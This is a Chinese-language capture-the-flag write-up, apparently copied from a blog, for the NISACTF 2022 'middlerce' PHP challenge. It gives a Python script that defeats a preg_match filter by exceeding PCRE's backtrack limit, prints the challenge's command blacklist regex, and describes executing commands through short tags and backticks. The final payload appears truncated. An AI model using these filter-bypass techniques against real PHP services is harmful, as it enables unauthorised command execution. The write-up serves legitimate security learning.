码农知识堂 - 1000bd
  •   Python
  •   PHP
  •   JS/TS
  •   JAVA
  •   C/C++
  •   C#
  •   GO
  •   Kotlin
  •   Swift
  • NSS [NISACTF 2022]middlerce


    NSS [NISACTF 2022]middlerce

    开题,直接给了源码。

    image-20230921214224354

    由语句$command = json_decode($txw4ever,true)['cmd'];可得,$txw4ever一定是json格式的数据,但是,preg_match()函数却过滤了{,同时.*贪婪匹配后又匹配括号里的字符,最后再.*后结束。看似无懈可击的过滤,其实可以使用PCRE回溯次数限制绕过。

    PHP为了防止正则表达式的拒绝服务攻击(reDOS),给pcre设定了一个回溯次数上限pcre.backtrack_limit默认1000000,超过1000000不会返回1或0而是false即超过限制即可。

    $_REQUEST可以接收GET和POST数据,由于GET不适合发太长的请求,这里我们选择用POST。

    payload生成脚本:

    import requests
    
    payload = '{"cmd":"cmd", "a":"'+'#'*1000000+'"}'
    res = requests.post("http://node4.anna.nssctf.cn:28035/",data = {"letter":payload})
    print(res.text)
    
    • 1
    • 2
    • 3
    • 4
    • 5

    脚本发个包,发现没有返回再加把油喔,说明preg_match()函数被成功绕过了。

    image-20230921222956591

    然后就是考虑【命令】如何绕过checkdata()函数检测的问题了。

    checkdata()函数的正则过滤如下:

    /\^|\||\~|assert|print|include|require|\(|echo|flag|data|php|glob|sys|phpinfo|POST|GET|REQUEST|exec|pcntl|popen|proc|socket|link|passthru|file|posix|ftp|\_|disk|tcp|cat|tac/i
    
    • 1

    这题是黑盒,也可以自己fuzz,结果不变。

    过滤的很死,依靠函数执行命令行不通了。那么命令执行我们就采用短标签+反引号。

    ?>
    
    • 1

    解释一下,则是相当于,payload最前面?>用于闭合,payload后面一部分相当于echo+反引号执行命令。

    成功得到flag。

    image-20230921223335747

  • 相关阅读:
    Java并发编程第10讲——CAS相关知识点详解
    Nginx环境搭建、负载均衡测试
    卷不赢,躺不平,怎么破?
    【Qt】界面布局
    查询药物的药效和机制
    2024中国人民大学计算机考研分析
    计算机组成原理_Cache与主存的映射方式
    深挖一下 Spring Cloud Hystrix 的原理和基本用法
    机器学习——奇异值分解案例(图片压缩未开始)
    centos篇----centos7安装docker-compose
  • 原文地址:https://blog.csdn.net/Jayjay___/article/details/133151889
  • 最新文章
  • 【JVM】编译执行与解释执行的区别是什么?JVM 使用哪种方式?
    用 Hashids 优雅解决 C 端自增 ID 暴露问题
    V8引擎 精品漫游指南--Ignition篇(上) 指令 栈帧 槽位 调用约定 内存布局 基础内容
    LLVM Pass快速入门(四):代码插桩
    milkup:桌面端 markdown AI续写和即时渲染
    基于项目工程构建SBOM(软件物料清单)的研究
    鸿蒙应用开发UI基础第二节:鸿蒙应用程序框架核心解析与实操
    .NET 中如何快速实现 List 集合去重?
    扣子Coze实战:从0到1打造抖音+小红书热点监控智能体
    浅谈数据访问层
  • 热门文章
  • 十款代码表白小特效 一个比一个浪漫 赶紧收藏起来吧!!!
    奉劝各位学弟学妹们,该打造你的技术影响力了!
    五年了,我在 CSDN 的两个一百万。
    Java俄罗斯方块,老程序员花了一个周末,连接中学年代!
    面试官都震惊,你这网络基础可以啊!
    你真的会用百度吗?我不信 — 那些不为人知的搜索引擎语法
    心情不好的时候,用 Python 画棵樱花树送给自己吧
    通宵一晚做出来的一款类似CS的第一人称射击游戏Demo!原来做游戏也不是很难,连憨憨学妹都学会了!
    13 万字 C 语言从入门到精通保姆级教程2021 年版
    10行代码集2000张美女图,Python爬虫120例,再上征途
小工具 小游戏
Copyright © 2022 侵权请联系2656653265@qq.com    京ICP备2022015340号-1

京公网安备 11010502049817号